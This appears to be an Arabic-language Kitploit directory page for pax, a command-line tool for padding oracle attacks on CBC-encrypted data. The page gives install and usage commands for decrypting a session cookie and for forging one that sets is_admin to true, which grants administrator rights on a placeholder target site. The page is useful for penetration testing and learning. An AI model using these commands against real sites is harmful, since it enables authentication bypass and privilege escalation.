Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
pax — :skull: :unlock: أداة CLI لهجمات PKCS7 padding oracle | Kitploit
أدوات/GitHubGitHub/liamg/pax
الاستغلالاستغلال تطبيقات الويبالتشفيراختبار الاختراق
GitHubliamg/pax

pax

💀 🔓 أداة CLI لهجمات PKCS7 padding oracle

عرض المستودع
142178منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

pax

Travis Build Status GoReportCard

استغل وسادات الحشو (padding oracles) للمتعة والربح!

باكس هي أداة لاستغلال وسادات الحشو بهدف:

  1. الحصول على النص الصريح (plaintext) لبيانات مشفرة بنظام CBC.
  2. الحصول على بايتات مشفرة لنص صريح معين، باستخدام خوارزمية التشفير المجهولة التي يستخدمها الوسيط (oracle).

يمكن استخدام هذا لكشف معلومات الجلسات المشفرة، وغالبًا لتجاوز المصادقة، ورفع الصلاحيات، وتنفيذ الأكواد عن بُعد عن طريق تشفير نص صريح مخصص وكتابته مرة أخرى على الخادم.

كالعادة، يجب استخدام هذه الأداة فقط على الأنظمة التي تملكها و/أو لديك إذن باختبارها!

التثبيت

قم بالتحميل من الإصدارات، أو قم بالتثبيت باستخدام Go:

root@kitploit:~
go get -u github.com/liamg/pax/cmd/pax

مثال استخدام

إذا وجدت وسيطًا مشبوهًا، حيث تكون البيانات المشفرة مخزنة داخل كوكي باسم SESS، يمكنك استخدام ما يلي:

root@kitploit:~
pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"

سيؤدي هذا - نأمل - إلى إعطائك بعض النصوص الصريحة، ربما شيء مثل:

root@kitploit:~
 {"user_id": 456, "is_admin": false}

يبدو أن بإمكانك رفع صلاحياتك هنا!

يمكنك محاولة فعل ذلك عن طريق أولاً إنشاء بياناتك المشفرة الخاصة التي سيقوم الوسيط بفك تشفيرها لتعود إلى نص صريح ماكر:

root@kitploit:~
pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'

سيخرج هذا مجموعة أخرى من البيانات المشفرة بترميز base64، ربما شيء مثل:

root@kitploit:~
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

الآن يمكنك فتح متصفحك وتعيين قيمة الكوكي SESS إلى القيمة أعلاه. عند تحميل صفحة الوسيط الأصلية، يجب أن ترى الآن أن صلاحياتك رُفعت إلى مستوى المسؤول.

كيف يعمل هذا؟

فيما يلي أدلة رائعة حول كيفية عمل هذا الهجوم:

  • https://robertheaton.com/2013/07/29/padding-oracle-attack/
  • https://blog.skullsecurity.org/2013/padding-oracle-attacks-in-depth
تنزيل الأداة